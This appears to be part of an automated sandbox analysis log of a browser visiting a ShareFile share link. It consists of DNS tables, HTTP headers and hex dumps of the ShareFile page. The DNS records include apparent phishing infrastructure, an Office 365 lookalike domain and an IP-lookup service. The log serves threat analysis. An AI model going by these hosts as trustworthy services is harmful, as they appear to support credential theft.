                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.408660889 CET1.1.1.1192.168.2.170x2cdfNo error (0)piletfeed-cdn.sharefile.io13.227.219.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.408660889 CET1.1.1.1192.168.2.170x2cdfNo error (0)piletfeed-cdn.sharefile.io13.227.219.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.408660889 CET1.1.1.1192.168.2.170x2cdfNo error (0)piletfeed-cdn.sharefile.io13.227.219.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.455507994 CET1.1.1.1192.168.2.170xc4abNo error (0)app.launchdarkly.comc3.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.455661058 CET1.1.1.1192.168.2.170xa42cNo error (0)app.launchdarkly.comc3.shared.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:05.763763905 CET1.1.1.1192.168.2.170xdc74No error (0)o49063.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:06.987929106 CET1.1.1.1192.168.2.170x4bcdNo error (0)o49063.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:07.008544922 CET1.1.1.1192.168.2.170xc369No error (0)piletfeed-cdn.sharefile.io13.224.189.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:07.008544922 CET1.1.1.1192.168.2.170xc369No error (0)piletfeed-cdn.sharefile.io13.224.189.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:07.008544922 CET1.1.1.1192.168.2.170xc369No error (0)piletfeed-cdn.sharefile.io13.224.189.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:07.008544922 CET1.1.1.1192.168.2.170xc369No error (0)piletfeed-cdn.sharefile.io13.224.189.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:24.323681116 CET1.1.1.1192.168.2.170xfa14Name error (3)171.39.242.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:26.759007931 CET1.1.1.1192.168.2.170x18feNo error (0)averellharriman.sharefile.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:26.759007931 CET1.1.1.1192.168.2.170x18feNo error (0)averellharriman.sharefile.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.898396969 CET1.1.1.1192.168.2.170xe3bdNo error (0)js-agent.newrelic.com162.247.243.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.900417089 CET1.1.1.1192.168.2.170x7796No error (0)events.launchdarkly.com52.206.112.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.900417089 CET1.1.1.1192.168.2.170x7796No error (0)events.launchdarkly.com35.171.73.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.900417089 CET1.1.1.1192.168.2.170x7796No error (0)events.launchdarkly.com3.233.199.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.900417089 CET1.1.1.1192.168.2.170x7796No error (0)events.launchdarkly.com54.161.6.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.900417089 CET1.1.1.1192.168.2.170x7796No error (0)events.launchdarkly.com18.211.63.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.900417089 CET1.1.1.1192.168.2.170x7796No error (0)events.launchdarkly.com100.24.172.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.900417089 CET1.1.1.1192.168.2.170x7796No error (0)events.launchdarkly.com44.208.210.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.900417089 CET1.1.1.1192.168.2.170x7796No error (0)events.launchdarkly.com3.219.136.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.914958000 CET1.1.1.1192.168.2.170xf9adNo error (0)averellharriman.sf-api.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:27.914958000 CET1.1.1.1192.168.2.170xf9adNo error (0)averellharriman.sf-api.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:28.894167900 CET1.1.1.1192.168.2.170xf0bNo error (0)bam.nr-data.netbam.cell.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:28.894167900 CET1.1.1.1192.168.2.170xf0bNo error (0)bam.cell.nr-data.netfastly-tls12-bam.nr-data.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:28.894167900 CET1.1.1.1192.168.2.170xf0bNo error (0)fastly-tls12-bam.nr-data.net162.247.243.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:30.084887981 CET1.1.1.1192.168.2.170xc6a1No error (0)citrix-sharefile-data.customer.pendo.io5352587489443840-data.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:30.084887981 CET1.1.1.1192.168.2.170xc6a1No error (0)5352587489443840-data.customer.pendo.iocname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:30.084887981 CET1.1.1.1192.168.2.170xc6a1No error (0)cname.pendo.io85.204.107.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:30.084887981 CET1.1.1.1192.168.2.170xc6a1No error (0)85.204.107.34.bc.googleusercontent.com34.107.204.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:31.061264038 CET1.1.1.1192.168.2.170xdfa4No error (0)citrix-sharefile-content.customer.pendo.io5352587489443840-content.customer.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:31.061264038 CET1.1.1.1192.168.2.170xdfa4No error (0)5352587489443840-content.customer.pendo.iocdn-cname.pendo.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:31.061264038 CET1.1.1.1192.168.2.170xdfa4No error (0)cdn-cname.pendo.io51.138.111.34.bc.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:31.061264038 CET1.1.1.1192.168.2.170xdfa4No error (0)51.138.111.34.bc.googleusercontent.com34.111.138.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:33.021290064 CET1.1.1.1192.168.2.170x8730No error (0)piletfeed-cdn.sharefile.io18.245.175.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:33.021290064 CET1.1.1.1192.168.2.170x8730No error (0)piletfeed-cdn.sharefile.io18.245.175.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:33.021290064 CET1.1.1.1192.168.2.170x8730No error (0)piletfeed-cdn.sharefile.io18.245.175.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:33.021290064 CET1.1.1.1192.168.2.170x8730No error (0)piletfeed-cdn.sharefile.io18.245.175.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:35.198590040 CET1.1.1.1192.168.2.170xd796No error (0)sf-cv.sharefile.com76.223.1.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:35.198590040 CET1.1.1.1192.168.2.170xd796No error (0)sf-cv.sharefile.com13.248.193.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:47.272738934 CET1.1.1.1192.168.2.170x633eNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:47.272738934 CET1.1.1.1192.168.2.170x633eNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:47.272738934 CET1.1.1.1192.168.2.170x633eNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:47.281546116 CET1.1.1.1192.168.2.170xde2No error (0)sf-renderx-us-east-1.sharefile.com3.33.222.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:47.281546116 CET1.1.1.1192.168.2.170xde2No error (0)sf-renderx-us-east-1.sharefile.com15.197.239.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:52.306423903 CET1.1.1.1192.168.2.170xe7a2No error (0)sf-temp-us-east-1-production.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:52.306423903 CET1.1.1.1192.168.2.170xe7a2No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:52.306423903 CET1.1.1.1192.168.2.170xe7a2No error (0)s3-w.us-east-1.amazonaws.com54.231.233.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:52.306423903 CET1.1.1.1192.168.2.170xe7a2No error (0)s3-w.us-east-1.amazonaws.com54.231.168.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:52.306423903 CET1.1.1.1192.168.2.170xe7a2No error (0)s3-w.us-east-1.amazonaws.com16.15.217.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:52.306423903 CET1.1.1.1192.168.2.170xe7a2No error (0)s3-w.us-east-1.amazonaws.com52.217.134.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:52.306423903 CET1.1.1.1192.168.2.170xe7a2No error (0)s3-w.us-east-1.amazonaws.com52.217.134.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:52.306423903 CET1.1.1.1192.168.2.170xe7a2No error (0)s3-w.us-east-1.amazonaws.com54.231.195.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:52.306423903 CET1.1.1.1192.168.2.170xe7a2No error (0)s3-w.us-east-1.amazonaws.com52.216.27.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:52.306423903 CET1.1.1.1192.168.2.170xe7a2No error (0)s3-w.us-east-1.amazonaws.com16.15.177.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:57.932873964 CET1.1.1.1192.168.2.170xafb9No error (0)pub-10305130932840cc9846324aa165bbf7.r2.dev172.66.0.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:36:57.932873964 CET1.1.1.1192.168.2.170xafb9No error (0)pub-10305130932840cc9846324aa165bbf7.r2.dev162.159.140.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:01.242185116 CET1.1.1.1192.168.2.170x7917No error (0)tmmc-radwvaste.com147.182.200.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:02.132467985 CET1.1.1.1192.168.2.170x40acNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:02.132467985 CET1.1.1.1192.168.2.170x40acNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:02.688342094 CET1.1.1.1192.168.2.170x7b93No error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:03.336026907 CET1.1.1.1192.168.2.170xf3c1No error (0)o365.alnassers.net147.79.74.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:04.147948980 CET1.1.1.1192.168.2.170x2a4cNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:07.338974953 CET1.1.1.1192.168.2.170x9263No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:07.338974953 CET1.1.1.1192.168.2.170x9263No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:07.338974953 CET1.1.1.1192.168.2.170x9263No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 5, 2024 20:37:07.338974953 CET1.1.1.1192.168.2.170x9263No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      0192.168.2.174970513.248.193.2514437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:35:59 UTC722OUTGET /public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0 HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:35:59 UTC2196INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:35:59 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=5LPRMPAF0UjPp7QhxKLs5naNhMW8MwLRnUYOQ27ahbiKIOuZFQGNO+9KZ6xXwnOzocd7OTcta3nn+mg7xy87RuOxYWXCvrvsRM4mTDCagjoJ/ihCLQ1jpx/76vcTHZ6f4UNjzLfQ2moabk5pXNIWgt24xhlOzTQ1Cwe9AH+pffFo; Expires=Tue, 12 Nov 2024 19:35:59 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=5LPRMPAF0UjPp7QhxKLs5naNhMW8MwLRnUYOQ27ahbiKIOuZFQGNO+9KZ6xXwnOzocd7OTcta3nn+mg7xy87RuOxYWXCvrvsRM4mTDCagjoJ/ihCLQ1jpx/76vcTHZ6f4UNjzLfQ2moabk5pXNIWgt24xhlOzTQ1Cwe9AH+pffFo; Expires=Tue, 12 Nov 2024 19:35:59 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=Snmn8pj0ZZ4uwxWtCZA3b0YHXcyu6K1Dlsief7t6XpBhPBE6HGa0tHCx/ffca3Z9HH7MtpPeOshsr0JBxIWo/HX69JyKONtlRtfJGLY3/Y+94W8Av55n50UqsDd5; Expires=Tue, 12 Nov 2024 19:35:59 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=Snmn8pj0ZZ4uwxWtCZA3b0YHXcyu6K1Dlsief7t6XpBhPBE6HGa0tHCx/ffca3Z9HH7MtpPeOshsr0JBxIWo/HX69JyKONtlRtfJGLY3/Y+94W8Av55n50UqsDd5; Expires=Tue, 12 Nov 2024 19:35:59 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                      Content-Security-Policy: style-src 'self' 'unsafe-inline' https://citrix-sharefile-content.customer.pendo.io https://citrix-sharefile-data.customer.pendo.io https://pendo-static-5352587489443840.storage.googleapis.com https://fonts.googleapis.com https://piletfeed-cdn.sharefile.io; script-src 'self' 'unsafe-inline' 'strict-dynamic' 'nonce-yD1lKId1dgcdioybLc606g==' https://request.eprotect.vantivcnp.com https://consent.trustarc.com https://www.gstatic.com/recaptcha/ https://citrix-sharefile-content.customer.pendo.io https://citrix-sharefile-data.customer.pendo.io https://pendo-static-5352587489443840.storage.googleapis.com https://maps.googleapis.com https://payments.worldpay.com https://0093b71e39a6.us-east-1.sdk.awswaf.com/0093b71e39a6/478ed03bbf12/challenge.js; frame-ancestors 'none'; report-uri /api/cspviolation
                                                                                                                                                                                                                      2024-11-05 19:35:59 UTC14188INData Raw: 34 30 30 30 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 53 68 61 72 65 46 69 6c 65 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 79 44 31 6c 4b 49 64 31 64 67 63 64 69 6f 79 62 4c 63 36 30 36 67 3d 3d 22 3e 0a 09 09 09 3b 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 3b 4e 52 45 55 4d 2e 69 6e 69 74 3d 7b 64 69 73 74 72 69 62 75 74 65 64 5f 74 72 61 63 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 74 72 75 65 7d 2c 70 72 69 76 61 63 79 3a 7b 63 6f
                                                                                                                                                                                                                      Data Ascii: 4000<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>ShareFile</title><script type="text/javascript" nonce="yD1lKId1dgcdioybLc606g==">;window.NREUM||(NREUM={});NREUM.init={distributed_tracing:{enabled:true},privacy:{co
                                                                                                                                                                                                                      2024-11-05 19:35:59 UTC2204INData Raw: 65 72 61 74 65 54 72 61 63 65 3a 73 7d 7d 2c 7b 7d 5d 2c 31 37 3a 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 70 61 72 61 6d 73 2c 6e 3d 74 68 69 73 2e 6d 65 74 72 69 63 73 3b 69 66 28 21 74 68 69 73 2e 65 6e 64 65 64 29 7b 74 68 69 73 2e 65 6e 64 65 64 3d 21 30 3b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 70 3b 72 2b 2b 29 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 5b 72 5d 2c 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 2c 21 31 29 3b 72 65 74 75 72 6e 20 65 2e 70 72 6f 74 6f 63 6f 6c 26 26 22 64 61 74 61 22 3d 3d 3d 65 2e 70 72 6f 74 6f 63 6f 6c 3f 76 6f 69 64 20 67 28 22 41 6a 61 78 2f 44 61 74 61 55 72 6c 2f 45 78 63 6c 75 64 65 64 22 29 3a 76 6f 69
                                                                                                                                                                                                                      Data Ascii: erateTrace:s}},{}],17:[function(t,e,n){function r(t){var e=this.params,n=this.metrics;if(!this.ended){this.ended=!0;for(var r=0;r<p;r++)t.removeEventListener(d[r],this.listener,!1);return e.protocol&&"data"===e.protocol?void g("Ajax/DataUrl/Excluded"):voi
                                                                                                                                                                                                                      2024-11-05 19:35:59 UTC16384INData Raw: 34 30 30 30 0d 0a 77 28 29 2c 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 22 61 62 6f 72 74 22 21 3d 3d 74 2e 74 79 70 65 7c 7c 6f 2e 6c 6f 61 64 43 61 70 74 75 72 65 43 61 6c 6c 65 64 7c 7c 28 6f 2e 70 61 72 61 6d 73 2e 61 62 6f 72 74 65 64 3d 21 30 29 2c 28 22 6c 6f 61 64 22 21 3d 3d 74 2e 74 79 70 65 7c 7c 6f 2e 63 61 6c 6c 65 64 3d 3d 3d 6f 2e 74 6f 74 61 6c 43 62 73 26 26 28 6f 2e 6f 6e 6c 6f 61 64 43 61 6c 6c 65 64 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 2e 6f 6e 6c 6f 61 64 29 29 26 26 6f 2e 65 6e 64 28 65 29 7d 63 61 74 63 68 28 6e 29 7b 74 72 79 7b 75 2e 65 6d 69 74 28 22 69 6e 74 65 72 6e 61 6c 2d 65 72 72 6f 72 22 2c 5b 6e 5d 29 7d 63 61 74 63 68 28 72 29 7b 7d 7d 7d 3b 66
                                                                                                                                                                                                                      Data Ascii: 4000w(),this.listener=function(t){try{"abort"!==t.type||o.loadCaptureCalled||(o.params.aborted=!0),("load"!==t.type||o.called===o.totalCbs&&(o.onloadCalled||"function"!=typeof e.onload))&&o.end(e)}catch(n){try{u.emit("internal-error",[n])}catch(r){}}};f
                                                                                                                                                                                                                      2024-11-05 19:35:59 UTC8INData Raw: 65 6e 27 29 3b 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: en');
                                                                                                                                                                                                                      2024-11-05 19:35:59 UTC8951INData Raw: 32 32 65 66 0d 0a 09 09 20 20 20 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 61 70 69 44 6f 6d 61 69 6e 22 2c 20 22 73 66 2d 61 70 69 2e 63 6f 6d 22 29 3b 0a 09 09 09 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 69 6f 44 6f 6d 61 69 6e 22 2c 20 22 73 68 61 72 65 66 69 6c 65 2e 69 6f 22 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 22 42 72 61 6e 63 68 22 29 3b 0a 09 09 09 09 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 22 4f 41 75 74 68 54 6f 6b 65 6e 22 29 3b 0a 09 09 09 09 76 61 72 20 70 65 6e 64 6f 4d 6f 64 65 6c 20 3d 20 7b 20 61 70 69 4b 65 79 3a 20 22 37 34 62 30 37 33 33 36
                                                                                                                                                                                                                      Data Ascii: 22ef sessionStorage.setItem("apiDomain", "sf-api.com");sessionStorage.setItem("ioDomain", "sharefile.io") sessionStorage.removeItem("Branch");sessionStorage.removeItem("OAuthToken");var pendoModel = { apiKey: "74b07336
                                                                                                                                                                                                                      2024-11-05 19:36:00 UTC16384INData Raw: 35 64 31 31 0d 0a 61 74 2d 61 6c 65 72 74 2d 6d 67 74 2d 70 69 6c 65 74 22 3a 74 72 75 65 2c 22 75 73 65 2d 61 65 73 2d 66 6f 72 2d 71 75 65 72 79 73 74 72 69 6e 67 2d 65 6e 63 72 79 70 74 69 6f 6e 2d 64 75 72 69 6e 67 2d 75 70 6c 6f 61 64 73 22 3a 66 61 6c 73 65 2c 22 72 65 76 69 65 77 5f 61 70 70 72 6f 76 61 6c 5f 70 69 6c 65 74 22 3a 74 72 75 65 2c 22 73 75 70 70 6f 72 74 5f 72 65 71 75 65 73 74 5f 66 6f 72 6d 22 3a 66 61 6c 73 65 2c 22 73 66 61 75 74 68 2d 65 6e 61 62 6c 65 2d 6e 65 77 2d 61 75 74 68 2d 62 61 6e 6e 65 72 2d 66 6f 72 2d 77 65 62 61 70 70 22 3a 74 72 75 65 2c 22 73 65 61 72 63 68 2d 72 65 63 6f 6d 6d 65 6e 64 2d 72 65 63 65 6e 74 2d 69 74 65 6d 73 22 3a 74 72 75 65 2c 22 72 65 74 75 72 6e 2d 65 6d 70 74 79 2d 73 66 2d 72 65 73 6f 75 72
                                                                                                                                                                                                                      Data Ascii: 5d11at-alert-mgt-pilet":true,"use-aes-for-querystring-encryption-during-uploads":false,"review_approval_pilet":true,"support_request_form":false,"sfauth-enable-new-auth-banner-for-webapp":true,"search-recommend-recent-items":true,"return-empty-sf-resour
                                                                                                                                                                                                                      2024-11-05 19:36:00 UTC7449INData Raw: 32 7d 2c 22 65 6e 61 62 6c 65 2d 61 72 63 68 69 76 65 2d 76 69 65 77 65 72 2d 6d 6f 64 65 2d 66 6f 72 2d 66 69 6e 72 61 2d 61 63 63 6f 75 6e 74 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 31 2c 22 76 65 72 73 69 6f 6e 22 3a 37 7d 2c 22 65 6e 61 62 6c 65 5f 62 65 74 61 5f 6d 6f 64 65 5f 6c 65 67 61 6c 5f 73 6f 6c 75 74 69 6f 6e 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 33 7d 2c 22 65 6e 61 62 6c 65 5f 6c 6f 67 73 5f 66 6f 72 5f 66 69 72 73 74 5f 70 61 72 74 79 5f 6f 70 74 69 6d 69 7a 65 64 5f 63 6c 69 65 6e 74 5f 63 61 6c 6c 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 33 7d 2c 22 65 6e 61 62 6c 65 5f 74 61 73 6b 5f 61 67 67 72 65 67 61 74 6f 72 5f 70 69 6c 65 74 22 3a 7b 22 76 61
                                                                                                                                                                                                                      Data Ascii: 2},"enable-archive-viewer-mode-for-finra-account":{"variation":1,"version":7},"enable_beta_mode_legal_solution":{"variation":0,"version":3},"enable_logs_for_first_party_optimized_client_call":{"variation":0,"version":3},"enable_task_aggregator_pilet":{"va
                                                                                                                                                                                                                      2024-11-05 19:36:00 UTC16384INData Raw: 34 30 30 30 0d 0a 33 31 7d 2c 22 64 6f 77 6e 6c 6f 61 64 2d 73 68 61 72 65 2d 69 74 65 6d 2d 75 73 69 6e 67 2d 73 74 72 65 61 6d 49 64 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 31 2c 22 76 65 72 73 69 6f 6e 22 3a 32 7d 2c 22 76 69 65 77 65 6e 67 69 6e 65 72 69 64 72 65 77 72 69 74 65 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 37 7d 2c 22 65 6e 61 62 6c 65 2d 65 73 69 67 6e 2d 70 69 6c 65 74 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 30 2c 22 76 65 72 73 69 6f 6e 22 3a 36 35 7d 2c 22 75 70 64 61 74 65 5f 63 6c 69 65 6e 74 5f 6c 61 62 65 6c 5f 69 6e 5f 73 68 61 72 65 66 69 6c 65 22 3a 7b 22 76 61 72 69 61 74 69 6f 6e 22 3a 31 2c 22 76 65 72 73 69 6f 6e 22 3a 35 7d 2c 22 52 65 73 74 61 70 69 43 61 63 68 65 54 54 4c
                                                                                                                                                                                                                      Data Ascii: 400031},"download-share-item-using-streamId":{"variation":1,"version":2},"viewengineridrewrite":{"variation":0,"version":7},"enable-esign-pilet":{"variation":0,"version":65},"update_client_label_in_sharefile":{"variation":1,"version":5},"RestapiCacheTTL
